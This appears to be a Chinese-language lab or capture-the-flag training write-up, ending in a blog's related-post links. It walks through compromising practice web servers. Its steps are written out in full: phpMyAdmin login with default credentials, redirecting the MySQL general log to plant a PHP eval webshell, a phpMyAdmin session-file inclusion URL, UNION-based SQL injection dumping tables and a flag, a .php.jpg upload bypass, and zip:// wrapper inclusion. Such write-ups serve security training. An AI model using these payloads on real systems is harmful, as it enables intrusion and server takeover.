Day-1 漏洞攻击实战

实训任务1 漏洞攻击实战一

使用 御剑 得到网站后台地址

数据库登录与日志配置​

  • 使用默认密码 root:root 登录phpMyAdmin,执行 SHOW VARIABLES LIKE 'general%' 查看日志状态。
  • 开启日志功能:set global general_log = "ON";(配图:SQL执行成功提示)。

​日志写入Webshell​

  • 修改日志路径到Web目录:

set global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';

  • 执行 SELECT '<?php @eval($_POST[1]);?>' 写入木马。

​连接Webshell​

  • 访问 http://靶机IP/shell.php,使用中国蚁剑成功连接。

实训任务2 漏洞攻击实战二

御剑扫描网站后台

发现存在www.zip文件(管理员备份文件)

存在数据库后台登录账号密码

运行SELECT " <?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>"
生成shell.php文件(未生成)

构造url运行存在session的sql命令生成shell文件

http://xxx.xx.xx.xxx:xxx/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_此处为步骤7获取到的sessionID

​连接Webshell​

访问 http://靶机IP/shell.php,使用中国蚁剑成功连接。

实训任务3 白云新闻搜索

​绕过过滤与注入验证​

  • 发现输入被转义,使用'触发报错。
  • 设置浏览器禁止使用JavaScript
    • 构造永真条件:' OR 1=1 -- ',确认存在注入。

​Union查询提取数据​

  • 确定列数后,联合查询表名:

    sql 复制代码
    ' union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables -- '
    
    ' union select 1,COLUMN_NAME,3 from INFORMATION_SCHEMA.columns -- '
    
    ' union select 1,2,flag from admin -- '

得到flag{fabbf4abe040f2fdac8234099facdccb}

实训任务4 手速要快

​绕过前端验证​

  • 修改文件后缀为.php.jpg <?php @eval($_POST[123]);?>

​访问Webshell​

实训任务5 包罗万象

将php文件压缩上传

​上传ZIP并触发解压​

上传包含shell.php的ZIP文件,利用伪协议包含:

sql 复制代码
http://192.168.210.84/index.php?url=zip:///var/www/html/upload/eee6b96824b2ab9ab6db41e36355eb89.zip%231

%23 转译为# '1' 应该与压缩包内的php文件同名

​获取服务器权限​

  • 通过中国蚁剑管理服务器文件系统。
相关推荐
Waitccy9 分钟前
Linux 系统安全基线检查:入侵防范测试标准与漏洞修复方法
linux·运维·网络·安全·系统安全·等保
鸿蒙布道师1 小时前
宇树科技安全漏洞揭示智能机器人行业隐忧
运维·网络·科技·安全·机器学习·计算机视觉·机器人
2501_9159184111 小时前
多账号管理与自动化中的浏览器指纹对抗方案
websocket·网络协议·tcp/ip·http·网络安全·https·udp
神经毒素12 小时前
WEB安全--RCE--webshell bypass2
安全·web安全
Johnstons13 小时前
AnaTraf:深度解析网络性能分析(NPM)
前端·网络·安全·web安全·npm·网络流量监控·网络流量分析
网络空间小黑13 小时前
常见WEB漏洞----暴力破解
计算机网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
Johny_Zhao13 小时前
K8S+nginx+MYSQL+TOMCAT高可用架构企业自建网站
linux·网络·mysql·nginx·网络安全·信息安全·tomcat·云计算·shell·yum源·系统运维·itsm
JoySSL证书厂商14 小时前
访问网站提示“不安全”“有风险”怎么办?
安全
Suckerbin15 小时前
基于HTTP头部字段的SQL注入:SQLi-labs第17-20关
网络·笔记·网络协议·安全·http·网络安全
武汉格发Gofartlic16 小时前
FEKO许可证的安全与合规性
大数据·运维·安全